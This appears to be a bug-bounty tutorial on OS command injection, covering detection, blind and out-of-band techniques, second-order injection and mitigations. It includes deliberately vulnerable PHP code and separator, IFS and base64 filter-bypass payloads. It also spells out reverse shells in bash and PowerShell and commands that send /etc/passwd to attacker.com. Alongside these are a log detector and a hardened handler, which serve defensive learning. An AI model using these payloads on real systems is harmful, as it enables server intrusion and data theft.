Master OS Command Injection: From Detection to Critical RCE Payouts in Bug Bounty + Video

Introduction:

OS command injection remains one of the most dangerous web vulnerabilities, often leading to remote code execution (RCE) and critical-severity bounties. Attackers can inject arbitrary operating system commands through unsanitized user inputs, compromising the entire server. For bug bounty hunters and penetration testers, mastering this flaw—including direct, blind, out-of-band, time-based, and second-order techniques—is essential for maximizing impact and rewards.

Learning Objectives:

  • Identify and differentiate between direct, blind, out-of-band, time-based, and second-order OS command injection vectors.
  • Execute exploitation techniques using custom payloads, Burp Suite, and command-line tools across Linux and Windows environments.
  • Implement mitigation strategies such as input validation, parameterization, and API security hardening.

You Should Know:

1. Understanding OS Command Injection – Core Concepts

OS command injection occurs when an application passes unsafe user-supplied data (e.g., form inputs, headers, cookies) to a system shell. Unlike code injection, this targets the underlying operating system. Common injection points include ping utilities, file converters, log viewers, and API endpoints that execute system commands.

How it works: An application might run `ping user_input` without sanitization. An attacker enters `8.8.8.8; whoami` – the semicolon terminates the intended command and executes whoami. On Windows, `&` or `|` achieves similar results.

Example vulnerable code (PHP):

<?php
// Vulnerable: $ip is concatenated straight into a shell command line, so
// shell metacharacters in the request (";", "|", "&", "$(...)") are
// interpreted by the shell instead of being treated as part of the address.
$ip = $_GET['ip'];
system("ping -c 4 " . $ip);

2. Detection Techniques – Manual and Automated

Before exploiting, confirm injection points using safe, observable payloads.

Step-by-step detection guide:

  1. Identify all input fields, parameters, and HTTP headers (User-Agent, X-Forwarded-For, Referer).
  2. Inject simple time-based payloads: `sleep 5` (Linux) or `timeout 5` (Windows). Observe response delay.
  3. Use arithmetic expansion: `| echo $((14*2))` – if the response shows 28, injection works.
  4. For blind detection, trigger DNS lookups: `nslookup test.collaborator.com` (Linux) or `ping -n 1 test.collaborator.com` (Windows).

Linux detection commands:

; sleep 5
| ping -c 1 attacker-server.com
$(whoami)
`id`

Windows detection commands:

& timeout 5
| ping -n 1 attacker-server.com
%COMPUTERNAME%

Automated scanning with ffuf:

ffuf -u "https://target.com/ping?ip=FUZZ" -w payloads.txt -fs 1234
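From the defender's side, the same probe shapes listed in this section (shell separators, `sleep`/`timeout` delays, DNS and HTTP lookups, `${IFS}` and `$(...)` substitution) can be hunted in web server logs. The following Python detector is an added example, not code from the original post; the log lines are constructed samples in Combined Log Format, and query values, Referer and User-Agent are URL-decoded before matching because probes arrive percent-encoded.

```python
"""Flag probable OS command injection probes in web access logs. Added example
(not from the original post); the sample log lines below are constructed."""
import re
from urllib.parse import parse_qs, urlsplit
# Constructed Combined Log Format samples (not real traffic); lines 2-5 carry probes.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] "GET /ping?ip=8.8.8.8 HTTP/1.1" 200 512 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
203.0.113.7 - - [10/Oct/2024:13:55:40 +0000] "GET /ping?ip=8.8.8.8%3B%20sleep%205 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2024:13:55:41 +0000] "GET /ping?ip=8.8.8.8%7C%20nslookup%20x.example.net HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2024:13:55:44 +0000] "GET /ping?ip=8.8.8.8 HTTP/1.1" 200 512 "-" "$(id)"
203.0.113.9 - - [10/Oct/2024:13:55:45 +0000] "GET /ping?ip=cat%24%7BIFS%7D%2Fetc%2Fpasswd HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')
# Each class is a weak signal on its own; is_suspicious() combines them.
INDICATORS = {
    "separator": re.compile(r"[;|&`]\s*[A-Za-z/]"),
    "substitution": re.compile(r"\$\(|\$\{IFS\}"),
    "time_delay": re.compile(r"\b(sleep|timeout)\s+\d", re.I),
    "oast_lookup": re.compile(r"\b(ping|nslookup|dig|curl|wget|certutil)\b", re.I),
    "recon_cmd": re.compile(r"\b(id|whoami|uname|cat|type|systeminfo)\b"),
}

def classify(value):
    """Return the set of indicator classes matched by one decoded value."""
    return {name for name, rx in INDICATORS.items() if rx.search(value)}

def is_suspicious(hits):
    # ';' is normal inside User-Agent strings, so a separator only counts when
    # paired with a command-shaped token; substitution syntax is flagged alone.
    return "substitution" in hits or (
        "separator" in hits and bool(hits & {"time_delay", "oast_lookup", "recon_cmd"}))

def scan_log(text):
    """Return (client ip, field, decoded value, sorted hits) per suspicious field."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed line: skip rather than guess
        # parse_qs splits on raw '&' before decoding, so an encoded %26 in a value still shows up.
        checks = [("referer", m["referer"]), ("user-agent", m["ua"])]
        query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
        checks += [("query:" + k, v) for k, vs in query.items() for v in vs]
        for field, value in checks:
            hits = classify(value)
            if is_suspicious(hits):
                findings.append((m["ip"], field, value, sorted(hits)))
    return findings
```

Running `scan_log(SAMPLE_LOG)` reports the four probe lines and leaves the first request alone even though its User-Agent contains semicolons.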

3. Direct (In-band) Exploitation – Step-by-Step

When command output returns in the HTTP response, direct exploitation yields immediate RCE.

Step-by-step guide for direct injection:

  1. Find a parameter reflecting output (e.g., ping result, file read). Inject `; id` (Linux) or `& whoami` (Windows).
  2. Enumerate system: `; uname -a` (Linux) or `& systeminfo` (Windows).
  3. Read sensitive files (Linux): `; cat /etc/passwd` → try `cat /etc/passwd | base64` to avoid filtering.
  4. Read sensitive files (Windows): `& type C:\Windows\win.ini`.
  5. Establish reverse shell:
    • Linux: `; bash -i >& /dev/tcp/attacker-ip/4444 0>&1`
    • Windows PowerShell: `& powershell -c "$client=New-Object System.Net.Sockets.TCPClient('attacker-ip',4444);$stream=$client.GetStream();[byte[]]$bytes=0..65535|%{0};while(($i=$stream.Read($bytes,0,$bytes.Length)) -ne 0){;$data=(New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i);$sendback=(iex $data 2>&1 | Out-String );$sendback2=$sendback + 'PS '+(pwd).Path+'> ';$sendbyte=([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"`

Payload variations to bypass filters:

  • Whitespace bypass: `${IFS}` (Linux) or `%20` → `cat${IFS}/etc/passwd`
  • Command substitution: `$(command)` or the same command wrapped in backticks
  • Encoding: `echo -n 'cat /etc/passwd' | base64` → `| echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -d | bash`

4. Blind OS Command Injection – Time-Based and Out-of-Band (OAST)

When no output returns, use time delays or external interactions.

Time-based detection:

; sleep 10
| ping -c 10 127.0.0.1
$(sleep 10)

Step-by-step out-of-band exploitation:

  1. Set up Burp Collaborator or Interactsh (`interactsh-client`).
  2. Inject DNS lookup: `; nslookup unique-id.burpcollaborator.net` (Linux) or `& ping -n 1 unique-id.burpcollaborator.net` (Windows).
  3. If a DNS hit appears, confirm injection. Then exfiltrate data:
    • Linux: `; cat /etc/passwd | base64 | curl -d @- http://attacker.com/exfil`
    • Windows: `& certutil -urlcache -f http://attacker.com/exfil?data=%COMPUTERNAME%`
  4. Use `curl` or `wget` for HTTP exfiltration: `; wget --post-file=/etc/passwd attacker.com/upload`

Blind command execution with time-based payloads (MySQL + command injection):

' OR sleep(10) AND '1'='1

5. Second-Order Command Injection

In second-order injection, the payload is stored (e.g., in database, file, or log) and executed later when another function calls the system command.

Example scenario: An application stores a username like `admin$(id)` during registration. When an admin later runs a system script to email users, the command executes.

Step-by-step testing:

  1. Submit payload in a stored field: `test"; curl http://attacker.com/ --data @/etc/passwd`
  2. Trigger the secondary function (e.g., export report, generate backup, send notification).
  3. Monitor out-of-band interactions.

Mitigation for developers: Never use user input directly in system calls. Always validate against an allowlist.

6. Mitigation and Secure Coding – Commands for Hardening

Prevention is better than bounty hunting. Here are hardening commands for Linux and Windows.

Linux – Restrict shell access and sanitize:

# Use PHP's escapeshellarg() or escapeshellcmd()
# Use Python's subprocess with list arguments (no shell=True)
subprocess.run(["ping", "-c", "4", user_input])  # Safe

# Disable dangerous functions in php.ini
disable_functions = exec,passthru,shell_exec,system,proc_open,popen,curl_exec,curl_multi_exec,parse_ini_file,show_source

# Set restrictive AppArmor or SELinux policies
sudo aa-enforce /usr/bin/vulnerable-app

Windows – PowerShell security:

# Constrained Language Mode
$ExecutionContext.SessionState.LanguageMode = "ConstrainedLanguage"

# Disable wscript and cscript
Disable-WindowsOptionalFeature -Online -FeatureName "Windows-Scripting"

# Use Application Control (WDAC)
New-CIPolicy -FilePath policy.xml -UserPEs

API security (REST/GraphQL): Validate input against an allowlist of expected values (e.g., ["8.8.8.8", "1.1.1.1"]) instead of blocking characters.

Cloud hardening (AWS Lambda / Azure Functions): Run functions with least privilege IAM roles, disable shell access, and use managed runtimes.
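To show the allowlist and no-shell advice in this section applied to the `ping` handler from section 1, here is an added Python example (not code from the original post). It assumes a hypothetical allowlist `ALLOWED_HOSTS`; the injected value `8.8.8.8; whoami` from section 1 is rejected before any process starts, and validation is repeated at the point of use so a stored value (the second-order case) gets the same check.

```python
"""Hardened replacement for the vulnerable ping handler from section 1. Added
example (not from the original post); ALLOWED_HOSTS is a hypothetical allowlist."""
import ipaddress
import subprocess

# Hypothetical allowlist of hostnames this feature is expected to reach.
ALLOWED_HOSTS = frozenset({"8.8.8.8", "1.1.1.1", "dns.example.net"})

class InvalidTarget(ValueError):
    """Raised when user input is not an acceptable ping target."""

def validate_target(raw, allowed_hosts=ALLOWED_HOSTS):
    """Return a canonical target or raise InvalidTarget.

    Accepts a syntactically valid IP address or an exact allowlist entry. Input
    carrying ';', '|', '$(' or '${IFS}' is rejected outright rather than
    "cleaned", so there is no escaping to get wrong and no blocklist to bypass.
    """
    value = raw.strip()
    if not value or len(value) > 253:
        raise InvalidTarget("empty or oversized target")
    try:
        return str(ipaddress.ip_address(value))  # canonical form
    except ValueError:
        pass
    if value in allowed_hosts:
        return value
    raise InvalidTarget(f"target not permitted: {value!r}")

def is_valid_target(raw):
    """Boolean convenience wrapper around validate_target()."""
    try:
        validate_target(raw)
        return True
    except InvalidTarget:
        return False

def build_ping_argv(target, count=4):
    """One argv element per argument; nothing here is re-parsed by a shell."""
    return ["ping", "-c", str(int(count)), target]

def run_ping(raw, timeout=15):
    """Validate at the point of use, then run ping with no shell involved.

    Re-validating here (not only at form submission) also covers the
    second-order case where the value was stored earlier.
    """
    target = validate_target(raw)  # raises before anything executes
    result = subprocess.run(build_ping_argv(target), capture_output=True,
                            text=True, timeout=timeout, check=False)
    return result.returncode, result.stdout
```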

7. Advanced Automation and Tooling

Speed up bug bounty workflows with custom scripts and wordlists.

Payload generation script (Python):

payloads = []
for cmd in ['id', 'whoami', 'uname -a', 'cat /etc/passwd']:
    for separator in [';', '|', '&', '$()', '`', '||', '&&']:
        payloads.append(f"{separator} {cmd}")
print("\n".join(payloads))

Using ffuf with blind payloads:

ffuf -u "https://target.com/archive?file=FUZZ" -w blind_payloads.txt -H "User-Agent: \$(nslookup test.burpcollaborator.net)" -ac

Burp Suite extensions: Use "Command Injection Attacker" or "Collaborator Everywhere" for automated OAST detection.

Windows batch script for fuzzing:

@echo off
for /f "tokens=*" %%a in (payloads.txt) do (
    curl -s "https://target.com/ping?ip=8.8.8.8%%a" --output nul
    timeout /t 1
)

What Undercode Say:

  • Key Takeaway 1: OS command injection remains a critical vulnerability because developers still use unsafe system calls. Mastering detection across direct, blind, and second-order vectors separates novice bug hunters from top earners.
  • Key Takeaway 2: Modern exploitation relies on out-of-band techniques (DNS/HTTP exfiltration) to bypass firewalls and WAFs. Combining time-based delays with OAST tools like Interactsh increases success rates in blind scenarios.

Analysis: The YesWeHack guide highlights a persistent truth: legacy codebases and rapid development cycles repeatedly introduce command injection flaws. From IoT devices to cloud APIs, any application that executes shell commands without strict allowlisting is vulnerable. Bug bounty platforms report average payouts of $3,000–$10,000 for RCE via command injection, with critical bounties exceeding $25,000. However, mitigation is straightforward—use parameterized APIs, avoid `system()` and `exec()` with user input, and implement input allowlists. For defenders, regular static analysis (e.g., `grep -r "system(" --include="*.php"`) and dynamic scanning with custom payloads are non-negotiable. As AI-generated code becomes common, injection flaws may increase unless security is embedded in training data. The future belongs to automated discovery tools paired with human creativity in chaining injections into full compromise.

Prediction:

Within two years, OS command injection will shift from manual exploitation to fully automated AI-powered detection, with large language models generating context-aware payloads in real time. However, defenders will counter with runtime application self-protection (RASP) and eBPF-based syscall filtering. Bug bounty hunters must adapt by focusing on business logic–based command injection (e.g., second-order via log files) and edge systems like embedded devices and OT networks, where traditional mitigations are often absent. The highest bounties will come from chaining command injection with privilege escalation or cloud metadata APIs, leading to full environment takeover.

Reported By: The Ultimate – Hackers Feeds